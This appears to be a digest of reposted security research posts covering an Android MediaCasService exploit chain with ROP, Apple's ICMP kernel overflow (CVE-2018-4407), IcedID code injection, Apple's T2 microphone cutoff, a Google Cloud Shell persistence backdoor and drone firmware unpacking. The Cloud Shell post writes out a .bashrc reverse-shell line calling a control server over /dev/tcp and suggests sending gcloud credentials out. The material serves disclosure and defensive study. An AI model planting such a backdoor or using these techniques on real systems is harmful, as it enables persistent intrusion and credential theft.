Snippet from hardware/interfaces/cas/1.0/default/DescramblerImpl.cpp (source)

As you can see, the code checks that srcBuffer lies inside the shared memory based on the hidl_memory size. After this the hidl_memory is not used anymore and the rest of the checks are performed against srcBuffer itself. Perfect! All we need then in order to achieve full read+write access is to use the vulnerability and then set srcBuffer’s size to more than 0xFFFFFFFF. This way, any value for the source and destination offsets would be valid.
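The logic of that check, and why an oversized hidl_memory defeats it, can be sketched in Python (a hypothetical rendering of the C++ check described above, not the actual AOSP code):

```python
U32_MAX = 0xFFFFFFFF

def validate_range_for_size(offset, length, total_size):
    # Overflow-safe rendering of the described check:
    # "offset + length <= total_size", without wrapping.
    return offset <= total_size and length <= total_size - offset

# Against an honest 2-page (0x2000) shared memory, a huge/negative
# offset such as 0xFFFFFFFF (-1) is rejected:
assert not validate_range_for_size(U32_MAX, 1, 0x2000)

# But once the truncation bug lets srcBuffer claim a size above 2**32,
# every 32-bit offset passes the very same check:
assert validate_range_for_size(U32_MAX, 1, 1 << 48)
```

This is exactly why setting srcBuffer's size to more than 0xFFFFFFFF makes every source and destination offset "valid".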

Using the vulnerability for out-of-bounds read


Using the vulnerability for out-of-bounds write

The TEE device

Before writing an exploit using this (very good) primitive, let’s think about what we really want this exploit to achieve. A look at the SELinux rules for this service shows that it is in fact heavily restricted and does not have a lot of permissions. Still, it has one interesting permission that a regular unprivileged app does not have: access to the TEE (Trusted Execution Environment) device.

This permission is extremely interesting as it lets an attacker access a wide variety of things: different device drivers for different vendors, different TrustZone operating systems and a large amount of trustlets. In my previous blog post, I have already discussed how dangerous this permission can be.

While there are indeed many things you can do with access to the TEE device, at this point I merely wanted to prove that I could get this access. Hence, my objective was to perform a simple operation which requires access to the TEE device. In the Qualcomm TEE device driver, there is a fairly simple ioctl which queries for the version of the QSEOS running on the device. Therefore, my target when building the exploit for MediaCasService was to run this ioctl and get its result.

The exploit

Note: My exploit is for a specific device and build – Pixel 2 with the May 2018 security update (build fingerprint: “google/walleye/walleye:8.1.0/OPM2.171019.029.B1/4720900:user/release-keys”). A link to the full exploit code is available at the end of the blog post.

So far we have full read+write over the target process memory. While this is a great primitive, there are two issues that need to be solved:

  • ASLR – while we do have full read access, it is only relative to where our shared memory was mapped; we do not know where it is compared to other data in memory. Ideally, we would like to find the address of the shared memory as well as addresses of other interesting data.
  • For each execution of the vulnerability, the shared memory gets mapped and then unmapped after the operation. There is no guarantee that the shared memory will get mapped in the same location each time; it is entirely possible that another memory region will take its place between executions.

Let’s take a look at some of the memory maps of the linker in the service memory space for this specific build:

As you can see, the linker happens to create a small gap of 2 memory pages (0x2000) between linker_alloc_small_objects and linker_alloc. The addresses for these memory maps are relatively high; all libraries loaded by this process are mapped to lower addresses. This means that this gap is the highest gap in memory. Since mmap’s behavior is to try to map to high addresses before low addresses, any attempt to map a memory region of 2 pages or less should be mapped in this gap. Luckily, the service does not normally map anything so small, which means that this gap should stay there. This solves our second issue, as this is a deterministic location in memory where our shared memory will always be mapped.

Let’s look at the data in the linker_alloc straight after the gap:

The linker data in here happens to be extremely helpful for us; it contains addresses which can easily indicate the address of the linker_alloc memory region. Since the vulnerability gives us relative read, and we already concluded that our shared memory will be mapped straight before this linker_alloc, we can use it in order to determine the address of the shared memory. If we take the address at offset 0x40 and subtract 0x10, we get the linker_alloc address. Subtracting the size of the shared memory itself then yields the shared memory address.
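In code, this address recovery is simple arithmetic (a sketch; the 0x40 and 0x10 offsets are the build-specific values quoted above):

```python
PAGE = 0x1000
SHM_SIZE = 2 * PAGE  # the 2-page shared memory mapped into the linker gap

def recover_addresses(leaked_qword_at_0x40):
    # The pointer read at offset 0x40 of linker_alloc points 0x10 bytes
    # past the start of the region (per the description above).
    linker_alloc = leaked_qword_at_0x40 - 0x10
    shared_mem = linker_alloc - SHM_SIZE
    return linker_alloc, shared_mem

# Example with a made-up leaked pointer value:
linker_alloc, shared_mem = recover_addresses(0x7000DEAD0050)
```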

So far we solved the second issue, but have only partially solved the first issue. We do have the address of our shared memory, but not of other interesting data. But what other data are we interested in?

Hijacking a thread

One part of the MediaCasService API is the ability for clients to provide listeners to events. If a client provides a listener, it will be notified when different CAS events occur. A client can also trigger events on its own, which will then be sent back to the listener. The way this works through Binder and HIDL is that when the service sends an event to the listener, it will wait until the listener has finished processing the event; a thread will be blocked waiting for the listener.

Flow of triggering an event

This is great for us; we can cause a known, pre-determined thread in the service to block waiting for us. Once we have a thread in this state, we can modify its stack in order to hijack it; only once we are done do we resume the thread by completing the event processing. But how do we find the thread stack in memory?

As our deterministic shared memory address is so high, the distance between that address and possible locations of the blocked thread stack is big. The effect of ASLR makes it too unreliable to try to find the thread stack relatively from our deterministic address, so we use another approach. We try to use a bigger shared memory and have it mapped before the blocked thread stack, so we will be able to reach it relatively through the vulnerability.

Instead of only getting one thread to that blocked state, we get multiple (5) threads. This causes more threads to be created, with more thread stacks allocated. By doing this, if there are a few thread-stack-sized gaps in memory, they should be filled, and at least one thread stack in a blocked thread should be mapped at a low address, without any library mapped before it (remember, mmap’s behavior is to map regions at high addresses before low addresses). Then, ideally, if we use a large shared memory, it should be mapped before that.

MediaCasService memory map after filling gaps and mapping our shared memory

One drawback is that there is a chance that other unexpected things (like jemalloc heap) will get mapped in the middle, so the blocked thread stack won’t be where we expect it to be. There could be multiple approaches to solve this. I decided to simply crash the service (using the vulnerability in order to write to an unmapped address) and try again, as every time the service crashes it simply restarts. In any case, this scenario normally does not happen, and even when it does, one retry is usually enough.

Once our shared memory is mapped before the blocked thread stack, we use the vulnerability to read two things from the thread stack:

  • The thread stack address, using pthread metadata which lies in the same memory region after the stack itself.
  • The address where libc is mapped at in order to later build a ROP chain using both gadgets and symbols in libc (libc has enough gadgets). We do this by reading a return address to a specific point in libc, which is in the thread stack.

Data read from thread stack

From now on, we can read and write to the thread stack using the vulnerability. We have both the address of the deterministic shared memory location and the address of the thread stack, so by using the difference between the addresses we can reach the thread stack from our shared memory (the small one with deterministic location).
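The offset computation used from here on can be sketched as follows (a hypothetical helper, assuming the offsets are treated as 64-bit unsigned values):

```python
def offset_from_shm(shm_base, target_addr, bits=64):
    # The primitive reads/writes relative to the shared memory base, so an
    # absolute target address becomes a delta; negative deltas wrap into
    # huge unsigned offsets, which still pass the broken bounds check.
    return (target_addr - shm_base) % (1 << bits)
```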

ROP chain

We have full access to a blocked thread stack which we can resume, so the next step is to execute a ROP chain. We know exactly which part of the stack to overwrite with our ROP chain, as we know the exact state that the thread is blocked at. After overwriting part of the stack, we can resume the thread so the ROP chain is executed.

Unfortunately, the SELinux limitations on this process prevent us from turning this ROP chain into full arbitrary code execution. There is no execmem permission, so anonymous memory cannot be mapped as executable, and we have no control over file types which can be mapped as executable. In this case, the objective is pretty simple (running a single ioctl), so I simply wrote a ROP chain which does this. In theory, if you want to perform more complex stuff, the primitive is so strong that it should still be possible. For instance, if you want to perform complex logic based on a result of a function, you could perform multi-stage ROP: perform one ROP chain which runs that function and writes its result somewhere, read that result, perform the complex logic in your own process and then run another ROP chain based on that.

As was previously mentioned, the objective is to obtain the QSEOS version. Here is the code that is essentially performed by the ROP chain in order to do that:

stack_addr is the address of the memory region of the stack, which is simply an address that we know is writable and will not be overwritten (the stack begins from the bottom and is not close to the top), so we can write the result to that address and then read it using the vulnerability. The sleep at the end is so the thread will not crash immediately after running the ROP chain, so we can read the result.

Building the ROP chain itself is pretty straightforward. There are enough gadgets in libc to perform it and all the symbols are in libc as well, and we already have libc’s address.
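A sketch of how such a chain is laid out as bytes before being written over the blocked thread's stack (the gadget and symbol offsets below are placeholders, not real values from any libc build):

```python
import struct

# Hypothetical offsets; the real exploit resolves gadget and symbol
# addresses from the leaked libc base described earlier.
POP_ARG_GADGET = 0x12345
SLEEP_SYMBOL = 0x67890

def pack_chain(words):
    """Serialize the 64-bit values that will overwrite the blocked
    thread's stack, in the order the gadgets should consume them."""
    return b"".join(struct.pack("<Q", w) for w in words)

libc_base = 0x7F0000000000  # example leaked base address
chain = pack_chain([
    libc_base + POP_ARG_GADGET,  # gadget: load the argument register
    5,                           # argument value, e.g. seconds to sleep
    libc_base + SLEEP_SYMBOL,    # call sleep() so the result survives
])
```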

After we are done, the process is left in a bit of an unstable state, as we hijacked a thread to execute our ROP chain. In order to leave everything in a clean state, we simply crash the service using the vulnerability (by writing to an unmapped address) in order to let it restart.


As I previously discussed in my BSidesLV talk and in my previous blog post, Google claims that Project Treble benefits Android security. While that is true in many cases, this vulnerability is another example of how elements of Project Treble could lead to the opposite. This vulnerability is in a library introduced specifically as part of Project Treble, and does not exist in a previous library which does pretty much the same thing. This time, the vulnerability is in a commonly used library, so it affects many high-privileged services.

Full exploit code is available on GitHub. Note: the exploit is only provided for educational or defensive purposes; it is not intended for any malicious or offensive use.



I would like to thank Google for their quick and professional response, Adam Donenfeld (@doadam), Ori Karliner (@oriHCX), Rani Idan (@raniXCH), Ziggy (@z4ziggy) and the rest of the Zimperium zLabs team.

If you have any questions, you are welcome to DM me on Twitter (@tamir_zb).

Kernel RCE caused by buffer overflow in Apple’s ICMP packet-handling code (CVE-2018-4407)

( Original text )

This post is about a heap buffer overflow vulnerability which I found in Apple’s XNU operating system kernel. I have written a proof-of-concept exploit which can reboot any Mac or iOS device on the same network, without any user interaction. Apple have classified this vulnerability as a remote code execution vulnerability in the kernel, because it may be possible to exploit the buffer overflow to execute arbitrary code in the kernel.

The following operating system versions and devices are vulnerable:

  • Apple iOS 11 and earlier: all devices (upgrade to iOS 12)
  • Apple macOS High Sierra, up to and including 10.13.6: all devices (patched in security update 2018-001)
  • Apple macOS Sierra, up to and including 10.12.6: all devices (patched in security update 2018-005)
  • Apple OS X El Capitan and earlier: all devices

I reported the vulnerability in time for Apple to patch the vulnerability for iOS 12 (released on September 17) and macOS Mojave (released on September 24). Both patches were announced retrospectively on October 30.

Severity and Mitigation

The vulnerability is a heap buffer overflow in the networking code in the XNU operating system kernel. XNU is used by both iOS and macOS, which is why iPhones, iPads, and Macbooks are all affected. To trigger the vulnerability, an attacker merely needs to send a malicious IP packet to the IP address of the target device. No user interaction is required. The attacker only needs to be connected to the same network as the target device. For example, if you are using the free WiFi in a coffee shop then an attacker can join the same WiFi network and send a malicious packet to your device. (If an attacker is on the same network as you, it is easy for them to discover your device’s IP address using nmap.) To make matters worse, the vulnerability is in such a fundamental part of the networking code that anti-virus software will not protect you: I tested the vulnerability on a Mac running McAfee® Endpoint Security for Mac and it made no difference. It also doesn’t matter what software you are running on the device — the malicious packet will still trigger the vulnerability even if you don’t have any ports open.

Since an attacker can control the size and content of the heap buffer overflow, it may be possible for them to exploit this vulnerability to gain remote code execution on your device. I have not attempted to write an exploit which is capable of doing this. My exploit PoC just overwrites the heap with garbage, which causes an immediate kernel crash and device reboot.

I am only aware of two mitigations against this vulnerability:

  1. Enabling stealth mode in the macOS firewall prevents the attack from working. Kudos to my colleague Henti Smith for discovering this, because this is an obscure system setting which is not enabled by default. As far as I’m aware, stealth mode does not exist on iOS devices.
  2. Do not use public WiFi networks. The attacker needs to be on the same network as the target device. It is not usually possible to send the malicious packet across the internet. For example, I wrote a fake web server which sends back a malicious reply when the target device tries to load a webpage. In my experiments, the malicious packet never arrived, except when the web server was on the same network as the target device.

Proof-of-concept exploit

I have written a proof-of-concept exploit which triggers the vulnerability. To give Apple’s users time to upgrade, I will not publish the source code for the exploit PoC immediately. However, I have made a short video which shows the PoC in action, crashing all the Apple devices on the local network.

The vulnerability

The bug is a buffer overflow in this line of code (bsd/netinet/ip_icmp.c:339):

m_copydata(n, 0, icmplen, (caddr_t)&icp->icmp_ip);

This code is in the function icmp_error. According to the comment, the purpose of this function is to «Generate an error packet of type error in response to bad packet ip». It uses the ICMP protocol to send out the error message. The header of the packet that caused the error is included in the ICMP message, so the purpose of the call to m_copydata on line 339 is to copy the header of the bad packet into the ICMP message. The problem is that the header might be too big for the destination buffer. The destination buffer is an mbuf. An mbuf is a datatype which is used to store both incoming and outgoing network packets. In this code, n is an incoming packet (containing untrusted data) and m is an outgoing ICMP packet. As we will see shortly, icp is a pointer into m. m is allocated on line 294 or line 296:

if (MHLEN > (sizeof(struct ip) + ICMP_MINLEN + icmplen))
  m = m_gethdr(M_DONTWAIT, MT_HEADER);  /* MAC-OK */
else
  m = m_getcl(M_DONTWAIT, MT_DATA, M_PKTHDR);

Slightly further down, on line 314, mtod is used to get m's data pointer:

icp = mtod(m, struct icmp *);

mtod is just a macro, so this line of code does not check that the mbuf is large enough to hold an icmp struct. Furthermore, the data is not copied to icp, but to &icp->icmp_ip, which is at an offset of +8 bytes from icp.

I do not have the necessary tools to be able to step through the XNU kernel in a debugger, so I am actually a little unsure about the exact allocation size of the mbuf. Based on what I see in the source code, I think that m_gethdr creates an mbuf that can hold 88 bytes, but I am less sure about m_getcl. Based on practical experiments, I have found that a buffer overflow is triggered when icmplen >= 84.
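The missing check reduces to simple arithmetic that icmp_error never performs; a sketch using the (admittedly uncertain) sizes discussed above:

```python
def m_copydata_overflows(dst_capacity, dst_offset, copy_len):
    # m_copydata writes copy_len bytes starting dst_offset bytes into the
    # destination mbuf; nothing in icmp_error checks this against the
    # mbuf's actual capacity.
    return dst_offset + copy_len > dst_capacity

# With the estimates above (an ~88-byte mbuf, destination at +8 for
# &icp->icmp_ip), the empirically observed trigger icmplen >= 84 overflows:
assert m_copydata_overflows(88, 8, 84)
assert not m_copydata_overflows(88, 8, 64)
```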

At this time, I will not say any more about how the exploit works. I want to give Apple users a chance to upgrade their devices first. However, in the relatively near future I will publish the source code for the exploit PoC in our SecurityExploits repository.

Finding the vulnerability with QL

I found this vulnerability by doing variant analysis on the bug that caused the buffer overflow vulnerability in the packet-mangler. That vulnerability was caused by a call to mbuf_copydata with a user-controlled size argument. So I wrote a simple query to look for similar bugs:

/**
 * @name mbuf copydata with tainted size
 * @description Calling m_copydata with an untrusted size argument
 *              could cause a buffer overflow.
 * @kind path-problem
 * @problem.severity warning
 * @id apple-xnu/cpp/mbuf-copydata-with-tainted-size
 */

import cpp
import semmle.code.cpp.dataflow.TaintTracking
import DataFlow::PathGraph

class Config extends TaintTracking::Configuration {
  Config() { this = "tcphdr_flow" }

  override predicate isSource(DataFlow::Node source) {
    source.asExpr().(FunctionCall).getTarget().getName() = "m_mtod"
  }

  override predicate isSink(DataFlow::Node sink) {
    exists(FunctionCall call |
      call.getArgument(2) = sink.asExpr() and
      call.getTarget().getName().matches("%copydata%")
    )
  }
}

from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink, source, sink, "m_copydata with tainted size."

This is a simple taint-tracking query which looks for dataflow from m_mtod to the size argument of a «copydata» function. The function named m_mtod returns the data pointer of an mbuf, so it is quite likely that it will return untrusted data. It is what the mtod macro expands to. Obviously m_mtod is just one of many sources of untrusted data in the XNU kernel, but I have not included any other sources to keep the query as simple as possible. This query returns 9 results, the first of which is the vulnerability in icmp_error. I believe the other 8 results are false positives, but the code is sufficiently complicated that I do not consider them to be bad query results.

Try QL on XNU

Unlike most other open source projects, XNU is not available to query on LGTM. This is because LGTM uses Linux workers to build projects, but XNU can only be built on a Mac. Even on a Mac, XNU is highly non-trivial to build. I would not have been able to do it if I had not found this incredibly useful blog post by Jeremy Andrus. Using Jeremy Andrus's instructions and scripts, I have manually built snapshots for the three most recent published versions of XNU. You can download the snapshots from these links: 10.13.4, 10.13.5, 10.13.6. Unfortunately, Apple have not yet released the source code for 10.14 (Mojave / iOS 12), so I cannot create a QL snapshot for running queries against it yet. To run queries on these QL snapshots, you will need to download QL for Eclipse. Instructions on how to use QL for Eclipse can be found here.


  • 2018-08-09: Privately disclosed to Apple. Proof-of-concept exploit included.
  • 2018-08-09: Report acknowledged by Apple.
  • 2018-08-20: Apple asked me to send them the exact macOS version number and a panic log.
  • 2018-08-20: Returned the requested information to Apple. Also sent them a slightly improved version of the exploit PoC.
  • 2018-08-22: Apple confirmed that the issue is fixed in the betas of macOS Mojave and iOS 12. However, they also said that they are «investigating addressing this issue on additional platforms» and that they will not disclose the issue until November 2018.
  • 2018-09-17: iOS 12 released by Apple. The vulnerability was fixed.
  • 2018-09-24: macOS Mojave released by Apple. The vulnerability was fixed.
  • 2018-10-30: Vulnerabilities disclosed.

"Send it back"


  • «I am Error». Screenshot from Zelda II: The Adventure of Link. The screenshot copyright is believed to belong to Nintendo. Image downloaded from wikipedia.
  • «Send it back». By Edward Backhouse.

Interesting technique to inject malicious code into svchost.exe

Once launched, IcedID takes advantage of an interesting technique to inject malicious code into svchost.exe — it does not require starting the target process in a suspended state, and is achieved by only using the following functions:

  • kernel32!CreateProcessA
  • ntdll!ZwAllocateVirtualMemory
  • ntdll!ZwProtectVirtualMemory
  • ntdll!ZwWriteVirtualMemory

IcedID’s code injection into svchost.exe works as follows:

  1. In the memory space of the IcedID process, the function ntdll!ZwCreateUserProcess is hooked.
  2. The function kernel32!CreateProcessA is called to launch svchost.exe and the CREATE_SUSPENDED flag is not set.
  3. The hook on ntdll!ZwCreateUserProcess is hit as a result of calling kernel32!CreateProcessA. The hook is then removed, and the actual function call to ntdll!ZwCreateUserProcess is made.
  4. At this point, the malicious process is still inside the hook; the svchost.exe process has been loaded into memory by the operating system, but the main thread of svchost.exe has not yet started.
  5. The call to ntdll!ZwCreateUserProcess returns the process handle for svchost.exe. Using the process handle, the functions ntdll!NtAllocateVirtualMemory and ntdll!ZwWriteVirtualMemory can be used to write malicious code to the svchost.exe memory space.
  6. In the svchost.exe memory space, the call to ntdll!RtlExitUserProcess is hooked to jump to the malicious code already written.
  7. The malicious function returns, which continues the code initiated by the call to kernel32!CreateProcessA, and the main thread of svchost.exe will be scheduled to run by the operating system.
  8. The malicious process ends.

Since svchost.exe has been called with no arguments, it would normally immediately shut down because there is no service to launch. However, as part of its shutdown, it will call ntdll!RtlExitUserProcess, which hits the malicious hook, and the malicious code will take over at this point.

Apple T2 security chip on new Macbook prevents software from using the mic to eavesdrop

( Original text )

The new Apple MacBook is equipped with the T2 security chip, which uses a hardware-disconnect design to automatically disable the microphone when necessary, such as when the laptop lid is closed. The Apple T2 security chip is bundled with the Secure Enclave coprocessor, which is designed to support macOS's Apple File System (APFS) encrypted storage, Touch ID, secure boot and more.

In addition, the chip has a number of controllers that integrate management functions for the system, SSD, audio, and image signal processors. As described in the Apple T2 Chip Security Overview document published in October 2018:

“All Mac portables with the Apple T2 Security Chip feature a hardware disconnect that ensures that the microphone is disabled whenever the lid is closed.”

As a result, when the MacBook lid is closed, even attackers running with kernel or root privileges cannot eavesdrop through the microphone. The webcam, however, is not disconnected from the hardware when the lid is closed. Apple said: “The camera is not disconnected in hardware because its field of view is completely obstructed with the lid closed.” This hardware-based protection makes it extremely difficult for malicious attackers to eavesdrop.


Persistent GCP backdoors with Google’s Cloud Shell

( Original text by Juan Berner )

Cloud Shell

Google Cloud Shell provides you with command-line access to your cloud resources directly from your browser without any associated cost. This is a very neat feature which means that whoever is browsing Google's Cloud Platform website can immediately jump into performing commands using the gcloud command.

There are two ways of accessing Cloud Shell:

  1. Through the authenticated web page
  2. Through the gcloud command-line tool: gcloud alpha cloud-shell
What working with Cloud Shell looks like

The good

Cloud Shell is a very useful tool that makes the interaction between the command-line gcloud utility and the web frontend seamless. At any point you can open a Cloud Shell view, where you will have a virtual machine at your disposal to perform any actions you might need. This virtual machine persists while your Cloud Shell session is active and terminates after an hour of inactivity¹. Even if the session is terminated, your home directory will be maintained as long as you are active at least once every 120 days².

Since Cloud Shell provides built-in authorization for access to projects and resources hosted on Google Cloud Platform³, there is no need to perform any login operation to access the resources you might need.

As google states it:

With Cloud Shell, the Cloud SDK gcloud command-line tool and other utilities you need are always available, up to date and fully authenticated when you need them.⁴

This Cloud Shell instance is created behind the scenes whenever the user needs to access it, and deleted the same way after a period of inactivity. Yet this instance is not part of the compute resources of any of the user's projects, nor does it allow the same kind of configuration.

To recap, we have established that:

  1. Any Google user with access to Google Cloud has access to a fully authenticated Cloud Shell instance.
  2. Said instance will maintain its home directory for at least 120 days if no activity happens.
  3. An organisation has no capability to monitor the activity of that instance.

The ugly

There are other services in Google Cloud that would allow you to plant a backdoor in a project: creating a cloud function, container or virtual machine would provide similar capabilities, as would a rogue service account with extensive privileges. So you might be asking: why focus on this one?

The key thing here is that an organisation is completely blind to this kind of abuse. System logs from Cloud Shell are not centralised, network logs can't be collected (you can't select which subnet your Cloud Shell is created in at all), and you can't list its information or visualize which Cloud Shell virtual machines are running, nor apply any of the other normal security controls you would impose on other GCP resources. The fact that Cloud Shell is available to your users means any of them has access to an unrestricted, unmonitored instance, and there is nothing you can do about it short of disabling the service.

Backdooring a Cloud Shell instance

A big limitation is that the backdoor would need to be added as the user themselves; this could happen through:

  • Social engineering that guides the victim into running a particular script
  • An unlocked laptop with a google account logged in to a google project
  • Malware on an endpoint with access to the google project

To add an example backdoor, I will modify the $HOME/.bashrc file so that every time someone logs in to their Cloud Shell it would execute:

echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null --norc --noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc

This will ensure that every time a user logs in to their Cloud Shell instance, no matter how many times it might be destroyed, there is a background callback to your server which will give you a fully authenticated shell on that instance, even after logout. That means that even as time passes and the user changes their password or their session tokens expire, any permissions the user gains will remain available to the attacker, as long as they don't notice the backdoor in their home profile (and who really checks those?).

The end result is that every time the user logs in, as long as your control server is listening, you will get a new, fully authenticated shell to control as the victim.
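On the receiving end, any TCP listener works; here is a minimal Python stand-in for `nc -lvp 443` on the control server (a hypothetical helper, not part of the original write-up):

```python
import socket

def make_listener(bind_addr="0.0.0.0", port=443):
    # Listen where the backdoored .bashrc expects $CCSERVER:443.
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_addr, port))
    srv.listen(1)
    return srv

def wait_for_shell(srv):
    # Block until the /dev/tcp callback arrives, then return the
    # connected socket; reading/writing it drives the remote bash.
    conn, peer = srv.accept()
    return conn, peer
```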

Instance receiving a callback from a backdoored Cloud Shell and using the cloud shell users permissions.

In practice you would probably want to make the backdoor upload the $HOME/.config/gcloud/ and $HOME/.gsutil/credstore2 back to your control server. The key part here is that even if those credentials are revoked, every time the infected user opens their Cloud Shell instance a new version of those credentials would be available to the adversary.

In short, Cloud Shell is a tool that — in its current form — is best suited for personal use or organisations which are comfortable in delegating the control over the Cloud Shell environment to their individual users. Enterprises with stricter security policies might want to disable Cloud Shell for their organisation (which they can do by filing a support request), until better monitoring and auditing capabilities are available in the tool.

An option to increase its security is to harden the instance through a custom Cloud Shell environment⁵ and centralize its logs through an internet tunnel, yet this will still be under the user's control, so there is no possibility of any remote checks on the security of the instance or visibility into its network activity. If the image is compromised and the security controls on it are modified, there will not be any external controls in place to detect it.

Until the moment Cloud Shell is just another compute resource running in your project, subject to the same controls as the rest of your resources, the risk it poses to an organisation might outweigh its rewards.


Brief reverse engineering work on FIMI A3

( Original text by Konrad Iturbe )

This is the start of a new series on reverse engineering consumer products, mainly to enhance their use but also to expose data leaks and vulnerabilities.

Something caught my eye last week. Xiaomi-backed FIMI, a Shenzhen company, released a drone. I tend to avoid most cheap drones since they tend to suck (bad quality camera, bad UX…) but this one is different.

This drone has a “DIY” port. This is a UART/PWM/GPIO port with what I assume are two pins for power. FIMI showcases how the user can attach a fireworks igniter or LEDs, but my mind went instantly to this DEF CON presentation from this year. The project is about a drone that is difficult to intercept, but the author of the presentation also shows some offensive uses of drones. This drone could theoretically carry a WiFi jammer or a promiscuous WiFi packet sniffer that can be activated from the ground. Possibilities are endless when you have this sort of port. The A3 also does not need a smartphone for operation; it includes a remote controller with an LCD panel. Having a smartphone controlling the drone opens a new vector for attackers (the WiFi network between the remote controller and the phone can be brute-forced, the phone can have malware…). DJI does not yet have an all-in-one remote controller, but Xiaomi has outsmarted them. Chinese innovation at its finest.

DIY port. Time to attach an RPi Zero with a Pineapple.
Some payloads that can be attached to drones. Source: David Melendez’s DEF CON talk PDF

On the camera side, for those interested, this drone is rocking the AMBA A12 chipset with a 1440p Sony CMOS sensor. It takes 8MP stills and records 1080p video at 30FPS with a bitrate of 60 MB/s. The gimbal is 2-axis, just like the DJI Spark's, but at ~$250 this drone is a worthy competitor to the DJI Spark. If only it shot 4K video and had a 3-axis gimbal, but we can't have everything in life.

Part 1: The firmware(s):

FIMI makes the firmware available for anyone to download here.

The firmware is split into three parts: the AMBA A12 camera firmware, the drone Cortex-A7 firmware, and the remote controller firmware.

wget -P drone_fw/

wget -P cam_fw/

wget -P remotecontrol_fw/

The firmwares are highly compressed. The filesize of each one is:




The first step is to decompress each firmware zip file. After decompression, the remote controller firmware yields a 1.2M BFU file, the drone firmware a 492K BIN file, and the camera firmware, which contains code relevant to the AMBA ISP, yields three files: a 3.8M firmware.bin and two 0-byte files, rollback.txt and update.txt. Looking deeper at firmware.bin with binwalk, three compressed files turn up: amba_ssp_svc.bin, dsp.bin.gz, and rom.bin.gz.

amba_ssp_svc.bin is a gz file, so the name should be amba_ssp_svc.bin.gz
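A quick way to verify that such a blob really is gzip data is to check for the 1f 8b magic bytes at its start. Demonstrated here on a locally generated sample rather than the actual firmware:

```shell
# Generate a stand-in for the carved blob and inspect its first two bytes.
printf 'sample payload' | gzip -c > sample.bin
od -An -tx1 -N2 sample.bin    # gzip streams always begin with 1f 8b
```

The same check applied to amba_ssp_svc.bin would confirm the missing .gz extension.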

Using the offsets binwalk reports, we can carve the gz files and their contents out of firmware.bin:

firmware.bin SHA512: 1cba74305d0491b957f1805c84e9b1cf5674002fc4f0de26905a16fb40303376187f1c35085b7455bff5c4de23cf8faa9479e4f78fd50dbf69947deb27f5d687

From here I used dd to extract the files. The "skip" value is the offset of the file, and the count is the next offset minus the current one.

dd if=[firmware.bin] of=out/amba_ssp_svc.bin.gz bs=1 skip=508 count=1812019
dd if=[firmware.bin] of=out/dsp.bin.gz bs=1 skip=1812527 count=1988127
dd if=[firmware.bin] of=out/rom.bin.gz bs=1 skip=3800654 count=143664
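The offset arithmetic (count = next_offset - current_offset) can be sanity-checked on a toy file built the same way: a header followed by back-to-back gzip streams, carved apart with the same dd invocation:

```shell
# Build a toy "firmware": an 8-byte header followed by two gzip streams,
# then carve each stream back out with the same dd arithmetic as above.
printf 'HEADER--' > fw.bin
printf 'hello' | gzip -c >> fw.bin
off1=8
off2=$(( $(wc -c < fw.bin) ))          # offset where the second stream starts
printf 'world' | gzip -c >> fw.bin
end=$(( $(wc -c < fw.bin) ))
dd if=fw.bin of=part1.gz bs=1 skip=$off1 count=$((off2 - off1)) 2>/dev/null
dd if=fw.bin of=part2.gz bs=1 skip=$off2 count=$((end - off2)) 2>/dev/null
gunzip -c part1.gz && echo && gunzip -c part2.gz && echo
```

If an offset or count is off by even one byte, gunzip rejects the carved stream, which makes this an easy way to validate the binwalk numbers before working on the real firmware.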

NOTE: All the files needed are on my github repository.

Now there is something to work with. Extract each file with gunzip and we end up with:

4.3M amba_ssp_svc.bin
4.9M dsp.bin
2.3M rom.bin

Part 2: Ambarella chipset:

This is as far as the unpacking goes. The 4.3M file is the AMBA chipset firmware. From here we can reuse some of the methods from my GoPro camera firmware reverse engineering work:

strings amba_ssp_svc.bin | grep "c:\\\\"

The aim of this reverse engineering work is to:

  • See if we can flash our own images onto the drone
  • See what kind of resolutions and frame rates are available
  • See if we can run custom commands or get a telnet/RTOS session
  • Disable NFZ (No Fly Zones) and enable FCC (US 5GHz mode) in Europe
  • Can we root the drone?

It appears we can flash images from the SD card to the drone:


As per the resolutions, see cam_fw/out/ in the GitHub repository.

The AMBA A12 chipset accepts some commands, including what appears to be an RTOS USB shell.

The drone firmware and controller firmware don't offer a similar way in: the drone firmware is a bin file with no sections, and the remote controller firmware is a bfu file.

It'd be interesting to see whether the drone can fly offline waypoints. Attaching a WiFi sniffer just got a whole lot easier.

I ordered this drone but it won’t arrive soon since it’s a pre-order.

Stay tuned for part 2!

GitHub repository: